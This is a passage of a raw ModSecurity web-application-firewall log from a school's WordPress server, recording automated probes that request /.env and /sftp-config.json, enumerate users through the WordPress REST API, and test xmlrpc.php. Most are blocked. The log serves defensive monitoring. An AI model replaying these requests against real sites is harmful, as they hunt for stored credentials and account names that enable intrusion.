(Java/11.0.26) --49999413-C-- demo.sayHello --49999413-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --49999413-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746827093748838 5516 (- - -) Stopwatch2: 1746827093748838 5516; combined=4084, p1=559, p2=3311, p3=29, p4=31, p5=91, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49999413-Z-- --e4e46a71-A-- [10/May/2025:04:50:31 +0700] aB54p8i6w7GTj2w44Z6XkQAAANc 103.236.140.4 35606 103.236.140.4 8181 --e4e46a71-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.183.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.183.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e4e46a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4e46a71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746827431545307 743 (- - -) Stopwatch2: 1746827431545307 743; combined=315, p1=281, p2=0, p3=0, p4=0, p5=34, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4e46a71-Z-- --1c3dae11-A-- [10/May/2025:05:20:45 +0700] aB5_vRLuBiaF9R054QBT8wAAAA8 103.236.140.4 37688 103.236.140.4 8181 --1c3dae11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.255.86.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.255.86.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c3dae11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c3dae11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746829245164601 2722 (- - -) Stopwatch2: 1746829245164601 2722; combined=1501, p1=442, p2=1028, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c3dae11-Z-- --a0703817-A-- [10/May/2025:05:21:59 +0700] aB6AB8i6w7GTj2w44Z6YPQAAANQ 103.236.140.4 37970 103.236.140.4 8181 --a0703817-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.38.186.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.38.186.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a0703817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0703817-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746829319067041 2839 (- - -) Stopwatch2: 1746829319067041 2839; combined=1341, p1=426, p2=886, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0703817-Z-- --87f42538-A-- [10/May/2025:05:27:28 +0700] aB6BUNr9PbfRBMhzxmRW-QAAAFY 103.236.140.4 40952 103.236.140.4 8181 --87f42538-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --87f42538-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87f42538-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746829648767072 3233 (- - -) Stopwatch2: 1746829648767072 3233; combined=1466, p1=491, p2=943, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87f42538-Z-- --d9285c3a-A-- [10/May/2025:05:27:33 +0700] aB6BVauC4AqLGUOyzyX4igAAAJQ 103.236.140.4 41032 103.236.140.4 8181 --d9285c3a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d9285c3a-C-- demo.sayHello --d9285c3a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9285c3a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746829653986478 5341 (- - -) Stopwatch2: 1746829653986478 5341; combined=4275, p1=513, p2=3542, p3=31, p4=36, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9285c3a-Z-- --2e667920-A-- [10/May/2025:05:37:57 +0700] aB6Dxdr9PbfRBMhzxmRXowAAAEk 103.236.140.4 43384 103.236.140.4 8181 --2e667920-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 196.41.47.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.41.47.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e667920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e667920-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746830277092387 3096 (- - -) Stopwatch2: 1746830277092387 3096; combined=1447, p1=457, p2=958, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e667920-Z-- --ff66206d-A-- [10/May/2025:05:58:54 +0700] aB6Irtr9PbfRBMhzxmRYwwAAAEk 103.236.140.4 49034 103.236.140.4 8181 --ff66206d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff66206d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff66206d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746831534418358 3462 (- - -) Stopwatch2: 1746831534418358 3462; combined=1500, p1=515, p2=949, p3=0, p4=0, p5=36, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff66206d-Z-- --162ba441-A-- [10/May/2025:05:59:04 +0700] aB6IuNr9PbfRBMhzxmRYxQAAAEM 103.236.140.4 49038 103.236.140.4 8181 --162ba441-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --162ba441-C-- demo.sayHello --162ba441-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --162ba441-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746831544150148 6531 (- - -) Stopwatch2: 1746831544150148 6531; combined=4713, p1=587, p2=3931, p3=54, p4=34, p5=64, sr=75, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --162ba441-Z-- --b9d9194a-A-- [10/May/2025:06:13:39 +0700] aB6MIxLuBiaF9R054QBYQwAAAAw 103.236.140.4 49184 103.236.140.4 8181 --b9d9194a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b9d9194a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9d9194a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746832419371079 2235 (- - -) Stopwatch2: 1746832419371079 2235; combined=1113, p1=382, p2=704, p3=0, p4=0, p5=26, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9d9194a-Z-- --352bd317-A-- [10/May/2025:06:13:48 +0700] aB6MLMi6w7GTj2w44Z6aDAAAAMg 103.236.140.4 49188 103.236.140.4 8181 --352bd317-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --352bd317-C-- demo.sayHello --352bd317-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --352bd317-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746832428100355 4785 (- - -) Stopwatch2: 1746832428100355 4785; combined=3728, p1=451, p2=3078, p3=23, p4=26, p5=89, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --352bd317-Z-- --ff8fcb43-A-- [10/May/2025:06:14:17 +0700] aB6MSRLuBiaF9R054QBYRQAAABE 103.236.140.4 49192 103.236.140.4 8181 --ff8fcb43-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff8fcb43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff8fcb43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746832457511112 3554 (- - -) Stopwatch2: 1746832457511112 3554; combined=1550, p1=513, p2=1006, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff8fcb43-Z-- --870a3450-A-- [10/May/2025:06:14:20 +0700] aB6MTBLuBiaF9R054QBYRwAAABM 103.236.140.4 49196 103.236.140.4 8181 --870a3450-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --870a3450-C-- demo.sayHello --870a3450-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --870a3450-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746832460793954 5562 (- - -) Stopwatch2: 1746832460793954 5562; combined=4122, p1=552, p2=3348, p3=29, p4=26, p5=97, sr=106, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --870a3450-Z-- --aa87627e-A-- [10/May/2025:06:19:50 +0700] aB6Nlsi6w7GTj2w44Z6aEwAAANc 103.236.140.4 49238 103.236.140.4 8181 --aa87627e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa87627e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa87627e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746832790729045 2243 (- - -) Stopwatch2: 1746832790729045 2243; combined=1149, p1=395, p2=727, p3=0, p4=0, p5=26, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa87627e-Z-- --17a90716-A-- [10/May/2025:06:19:55 +0700] aB6Nm6uC4AqLGUOyzyX6TAAAAIw 103.236.140.4 49244 103.236.140.4 8181 --17a90716-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.207 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17a90716-C-- demo.sayHello --17a90716-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17a90716-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746832795915839 5224 (- - -) Stopwatch2: 1746832795915839 5224; combined=3937, p1=515, p2=3204, p3=30, p4=27, p5=94, sr=110, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17a90716-Z-- --ce20a12b-A-- [10/May/2025:06:20:57 +0700] aB6N2RLuBiaF9R054QBYTgAAAAI 103.236.140.4 49252 103.236.140.4 8181 --ce20a12b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce20a12b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce20a12b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746832857011231 3555 (- - -) Stopwatch2: 1746832857011231 3555; combined=1437, p1=470, p2=935, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce20a12b-Z-- --5e30af62-A-- [10/May/2025:06:21:14 +0700] aB6N6si6w7GTj2w44Z6aFgAAAMM 103.236.140.4 49258 103.236.140.4 8181 --5e30af62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5e30af62-C-- demo.sayHello --5e30af62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e30af62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746832874293488 5542 (- - -) Stopwatch2: 1746832874293488 5542; combined=4167, p1=542, p2=3401, p3=26, p4=29, p5=98, sr=120, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e30af62-Z-- --d9999012-A-- [10/May/2025:06:43:06 +0700] aB6TChLuBiaF9R054QBYagAAAAw 103.236.140.4 49412 103.236.140.4 8181 --d9999012-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.227.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.227.246 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.32.3 Accept: */* --d9999012-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 